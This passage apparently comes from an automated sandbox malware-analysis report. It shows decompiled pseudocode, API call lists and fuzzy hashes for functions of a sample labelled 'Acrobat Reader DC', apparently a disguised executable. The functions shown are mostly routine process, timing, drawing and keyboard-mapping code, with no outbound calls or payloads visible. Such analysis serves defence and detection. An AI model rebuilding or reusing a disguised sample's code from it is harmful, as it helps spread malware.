					} while (_t34 < _t33);
				}
				_t40 = E00413EB8(_t35, _t50, _t39, L"\r\n");
				_t44 = _t43 + 8;
				while(_t40 != 0) {
					_t29 = E004111C1(_t40);
					_t36 = _a4;
					_t45 = _t44 + 4;
					GetTextExtentPoint32W(_a4, _t40, _t29, _t41);
					_t31 = _t41->cx;
					_t52 = _t31 - _v12;
					if(_t31 > _v12) {
						_v12 = _t31;
					}
					_t40 = E00413EB8(_t36, _t52, 0, L"\r\n");
					_t44 = _t45 + 8;
				}
				_t41->cy = _t41->cy * _a12;
				_t41->cx = _v12;
				return E00436508( &_v20);
			}



















                                  0x0044389a
                                  0x0044389a
                                  0x004438a2
                                  0x004438b3
                                  0x004438b8
                                  0x004438bb
                                  0x004438be
                                  0x004438c1
                                  0x004438c3
                                  0x004438c6
                                  0x004438cd
                                  0x004438d2
                                  0x004438d7
                                  0x004438da
                                  0x004438df
                                  0x004438e1
                                  0x004438e1
                                  0x004438e5
                                  0x004438e6
                                  0x004438eb
                                  0x004438ee
                                  0x004438ee
                                  0x004438da
                                  0x004438fd
                                  0x004438ff
                                  0x00443904
                                  0x0044390c
                                  0x00443911
                                  0x00443914
                                  0x0044391a
                                  0x00443920
                                  0x00443922
                                  0x00443925
                                  0x00443927
                                  0x00443927
                                  0x00443936
                                  0x00443938
                                  0x0044393b
                                  0x00443949
                                  0x00443950
                                  0x0044395d

                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcslen.LIBCMT ref: 004438CD
                                  • _wcslen.LIBCMT ref: 004438E6
                                  • _wcstok.LIBCMT ref: 004438F8
                                  • _wcslen.LIBCMT ref: 0044390C
                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                  • _wcstok.LIBCMT ref: 00443931
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                  • String ID:
                                  • API String ID: 3632110297-0
                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436E94 Relevance: 9.1, APIs: 6, Instructions: 75processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00436E94(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, void* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				int _v8;
				signed char _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t36;
				signed int _t40;
				void* _t53;
				signed int _t56;

				_t29 = _a16;
				_t56 = _a24;
				_t53 = 0;
				_a16 = 0;
				if((_t29 & 0x00000001) == 0) {
					if((_t29 & 0x00000002) != 0) {
						_t53 = 2;
					}
				} else {
					_t53 = 1;
				}
				_t40 = 0;
				if((_t29 & 0x00000004) == 0) {
					L6:
					_t31 = _a12;
					__imp__CreateProcessWithLogonW(_a4, _a8, _t31, _t53, 0, _a20, _t56 | 0x00000400, _a16, _a28, _a32, _a36);
					_t40 = _t40 & 0xffffff00 | _t31 != 0x00000000;
					goto L7;
				} else {
					_a24 = 0;
					_t36 = OpenProcessToken(GetCurrentProcess(), 0xa,  &_a24);
					__imp__CreateEnvironmentBlock( &_a16, _a24, 1);
					_v8 = _t36;
					CloseHandle(_a24);
					if(_v8 == 0) {
						L7:
						_t32 = _a16;
						if(_t32 != 0) {
							__imp__DestroyEnvironmentBlock(_t32);
						}
						return _t40;
					}
					goto L6;
				}
			}











                                  0x00436e98
                                  0x00436e9d
                                  0x00436ea3
                                  0x00436ea5
                                  0x00436eaa
                                  0x00436eb3
                                  0x00436eb5
                                  0x00436eb5
                                  0x00436eac
                                  0x00436eac
                                  0x00436eac
                                  0x00436eba
                                  0x00436ebe
                                  0x00436ef9
                                  0x00436f0b
                                  0x00436f23
                                  0x00436f2b
                                  0x00000000
                                  0x00436ec0
                                  0x00436ec6
                                  0x00436ed0
                                  0x00436ee0
                                  0x00436ee6
                                  0x00436eed
                                  0x00436ef7
                                  0x00436f2e
                                  0x00436f2e
                                  0x00436f33
                                  0x00436f36
                                  0x00436f36
                                  0x00436f44
                                  0x00436f44
                                  0x00000000
                                  0x00436ef7

                                  APIs
                                  • GetCurrentProcess.KERNEL32(0000000A,?), ref: 00436EC9
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436ED0
                                  • CreateEnvironmentBlock.USERENV(?,?,00000001), ref: 00436EE0
                                  • CloseHandle.KERNEL32(?), ref: 00436EED
                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00436F23
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 00436F36
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                  • String ID:
                                  • API String ID: 1413079979-0
                                  • Opcode ID: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction ID: dd31e3d5ef53dadf09d6f4902918c4fef8fb0ebcc20249036383472598af8dfc
                                  • Opcode Fuzzy Hash: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction Fuzzy Hash: 10214C7620020AABDB14CF69DD59EEB37ADEB8D310F15851AFD05A3250C775EC12CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E004331A2(int __eax, signed long long __fp0, long _a4, signed short _a6) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				union _LARGE_INTEGER _v20;
				union _LARGE_INTEGER _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				union _LARGE_INTEGER _v44;
				signed int _t20;
				long _t26;
				long _t27;
				signed long long _t28;

				_t28 = __fp0;
				_t13 = __eax;
				_t26 = _a4;
				_t27 = _t26;
				if(_t27 < 0) {
					return __eax;
				} else {
					if(_t27 != 0) {
						if(_t26 >= 0xf) {
							L8:
							Sleep(_t26);
							return _t13;
						}
						_t13 = QueryPerformanceCounter( &_v28);
						if(_t13 == 0) {
							goto L8;
						}
						QueryPerformanceFrequency( &_v44);
						do {
							Sleep(0);
							QueryPerformanceCounter( &_v20);
							asm("fnstcw word [ebp+0xa]");
							asm("sbb ecx, [ebp-0x14]");
							_v36 = _v20.LowPart - _v28.LowPart;
							_v32 = _v16;
							asm("fild qword [ebp-0x20]");
							asm("fild qword [ebp-0x28]");
							_t20 = _a6 & 0x0000ffff | 0x00000c00;
							_v8 = _t20;
							asm("fdivp st1, st0");
							_t28 = _t28 *  *0x48cd40;
							asm("fldcw word [ebp-0x4]");
							asm("fistp qword [ebp-0x8]");
							asm("fldcw word [ebp+0xa]");
						} while (_v12 < _t26);
						return _t20;
					} else {
						Sleep(0);
						return _t13;
					}
				}
			}















                                  0x004331a2
                                  0x004331a2
                                  0x004331a9
                                  0x004331ad
                                  0x004331af
                                  0x00433243
                                  0x004331b5
                                  0x004331b5
                                  0x004331c8
                                  0x00433237
                                  0x00433238
                                  0x00000000
                                  0x00433238
                                  0x004331d4
                                  0x004331d8
                                  0x00000000
                                  0x00000000
                                  0x004331de
                                  0x004331e4
                                  0x004331e6
                                  0x004331f0
                                  0x004331f2
                                  0x004331fe
                                  0x00433201
                                  0x00433204
                                  0x00433207
                                  0x0043320e
                                  0x00433211
                                  0x00433216
                                  0x00433219
                                  0x0043321b
                                  0x00433221
                                  0x00433224
                                  0x0043322a
                                  0x0043322d
                                  0x00433236
                                  0x004331b7
                                  0x004331b9
                                  0x004331c4
                                  0x004331c4
                                  0x004331b5

                                  APIs
                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00447275(struct HDC__* _a4, int _a8, int _a12, signed char _a16) {
				void* _t10;
				int _t19;
				int _t22;
				struct HDC__* _t24;

				_t19 = _a8;
				_t24 = _a4;
				_t22 = _a12;
				if((_a16 & 0x00000001) != 0) {
					E0044719B(_t24, 0, 0xffffffff, 0, 1);
					MoveToEx(_t24, _t19 - 2, _t22, 0);
					LineTo(_t24, _t19 + 3, _t22);
					MoveToEx(_t24, _t19, _t22 - 2, 0);
					LineTo(_t24, _t19, _t22 + 3);
					if( *0x4a86ec != 0) {
						EndPath(_t24);
						 *0x4a86ec = 0;
					}
					return StrokePath(_t24);
				}
				return _t10;
			}







                                  0x0044727d
                                  0x00447281
                                  0x00447285
                                  0x00447288
                                  0x00447293
                                  0x004472a0
                                  0x004472ac
                                  0x004472ba
                                  0x004472c6
                                  0x004472d3
                                  0x004472d6
                                  0x004472dc
                                  0x004472dc
                                  0x00000000
                                  0x004472e4
                                  0x004472ee

                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                  • EndPath.GDI32(?), ref: 004472D6
                                  • StrokePath.GDI32(?), ref: 004472E4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                  • String ID:
                                  • API String ID: 372113273-0
                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E0044CC51(void* __ebx, int _a4, int _a8) {
				intOrPtr _v8;
				void* __edi;
				void* __esi;
				int _t18;
				intOrPtr* _t24;
				int* _t29;
				struct HDC__* _t34;

				_t24 = _a8;
				_t29 = _a4;
				if(_t29 != 0) {
					if(_t24 != 0) {
						goto L2;
					} else {
						_push(0x80004003);
						E004457C1();
						asm("int3");
						_push(_t33);
						_push(_t29);
						E00408F40(_v8, _v8 + 0x20);
						return E00408F40(_t31, _t31);
					}
				} else {
					_push(0x80004003);
					E004457C1();
					L2:
					_t34 = GetDC(0);
					_a8 = GetDeviceCaps(_t34, 0x58);
					_a4 = GetDeviceCaps(_t34, 0x5a);
					ReleaseDC(0, _t34);
					 *_t24 = MulDiv(0x9ec,  *_t29, _a8);
					_t18 = MulDiv(0x9ec, _t29[1], _a4);
					 *(_t24 + 4) = _t18;
					return _t18;
				}
			}










                                  0x0044cc55
                                  0x0044cc5a
                                  0x0044cc5f
                                  0x0044ccc7
                                  0x00000000
                                  0x0044ccc9
                                  0x0044ccc9
                                  0x0044ccce
                                  0x0044ccd3
                                  0x0044ccd7
                                  0x0044ccd8
                                  0x0044ccdf
                                  0x0044ccee
                                  0x0044ccee
                                  0x0044cc61
                                  0x0044cc61
                                  0x0044cc66
                                  0x0044cc6b
                                  0x0044cc73
                                  0x0044cc81
                                  0x0044cc8d
                                  0x0044cc90
                                  0x0044ccad
                                  0x0044ccb9
                                  0x0044ccbd
                                  0x0044ccc2
                                  0x0044ccc2

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                  • ReleaseDC.USER32 ref: 0044CC90
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00417082(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x48d0e8);
				E00416C70(__ebx, __edi, __esi);
				_t31 = E00417A69(__ebx, _t35);
				_t15 =  *0x490800; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004182CB(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x490708; // 0xa72c70
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x4902e0;
								if(__eflags != 0) {
									E00413748(_t33);
								}
							}
						}
						_t21 =  *0x490708; // 0xa72c70
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x490708; // 0xa72c70
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0041711D();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00411924(_t29, _t38);
				}
				return E00416CB5(_t33);
			}










                                  0x00417082
                                  0x00417082
                                  0x00417082
                                  0x00417082
                                  0x00417084
                                  0x00417089
                                  0x00417093
                                  0x00417095
                                  0x0041709d
                                  0x004170be
                                  0x004170c4
                                  0x004170c8
                                  0x004170cb
                                  0x004170ce
                                  0x004170d4
                                  0x004170d6
                                  0x004170d8
                                  0x004170e1
                                  0x004170e3
                                  0x004170e5
                                  0x004170eb
                                  0x004170ee
                                  0x004170f3
                                  0x004170eb
                                  0x004170e3
                                  0x004170f4
                                  0x004170f9
                                  0x004170fc
                                  0x00417102
                                  0x00417106
                                  0x00417106
                                  0x0041710c
                                  0x00417113
                                  0x004170a5
                                  0x004170a5
                                  0x004170a5
                                  0x004170a8
                                  0x004170aa
                                  0x004170ac
                                  0x004170ae
                                  0x004170b3
                                  0x004170bb

                                  APIs
                                  • __getptd.LIBCMT ref: 0041708E
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __amsg_exit.LIBCMT ref: 004170AE
                                  • __lock.LIBCMT ref: 004170BE
                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                  • _free.LIBCMT ref: 004170EE
                                  • InterlockedIncrement.KERNEL32(00A72C70), ref: 00417106
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410AB0(intOrPtr* __esi) {
				int _t20;

				 *__esi = 5;
				 *((intOrPtr*)(__esi + 4)) = 5;
				 *((short*)(__esi + 8)) = 1;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((intOrPtr*)(__esi + 0x14)) = 0;
				 *((short*)(__esi + 0x18)) = 0;
				 *((intOrPtr*)(__esi + 0x1a)) = 0;
				 *((short*)(__esi + 0x1e)) = 0;
				 *((intOrPtr*)(__esi + 0xc)) = 4;
				 *((char*)(__esi + 0x29)) = MapVirtualKeyW(0x5b, 0);
				 *((char*)(__esi + 0x26)) = MapVirtualKeyW(0x10, 0);
				 *((char*)(__esi + 0x27)) = MapVirtualKeyW(0xa0, 0);
				 *((char*)(__esi + 0x28)) = MapVirtualKeyW(0xa1, 0);
				 *((char*)(__esi + 0x24)) = MapVirtualKeyW(0x11, 0);
				_t20 = MapVirtualKeyW(0x12, 0);
				 *(__esi + 0x25) = _t20;
				return _t20;
			}




                                  0x00410aba
                                  0x00410ac0
                                  0x00410ac7
                                  0x00410acd
                                  0x00410ad0
                                  0x00410ad3
                                  0x00410ad8
                                  0x00410adb
                                  0x00410ae1
                                  0x00410aed
                                  0x00410af8
                                  0x00410b03
                                  0x00410b0b
                                  0x00410b13
                                  0x00410b16
                                  0x00410b19
                                  0x00410b1d

                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044B63B(intOrPtr _a4) {
				void* _t6;
				long _t8;
				LONG* _t13;
				intOrPtr _t17;
				struct _CRITICAL_SECTION* _t18;
				void** _t19;

				_t17 = _a4;
				_t19 = _t17 + 0x30;
				if( *(_t17 + 0x30) != 0) {
					_t13 = _t17 + 0x34;
					_t8 = InterlockedExchange(_t13,  *(_t17 + 0x34));
					if(_t8 != 0x1f6) {
						_t18 = _t17 + 0x14;
						EnterCriticalSection(_t18);
						TerminateThread( *_t19, 0x1f6);
						WaitForSingleObject( *_t19, 0x3e8);
						E00432614(_t19);
						_t8 = InterlockedExchange(_t13, 0x1f6);
						LeaveCriticalSection(_t18);
					}
					return _t8;
				}
				return _t6;
			}









                                  0x0044b640
                                  0x0044b647
                                  0x0044b64a
                                  0x0044b650
                                  0x0044b655
                                  0x0044b660
                                  0x0044b662
                                  0x0044b666
                                  0x0044b674
                                  0x0044b682
                                  0x0044b689
                                  0x0044b697
                                  0x0044b69e
                                  0x0044b69e
                                  0x00000000
                                  0x0044b6a4
                                  0x0044b6a8

                                  APIs
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
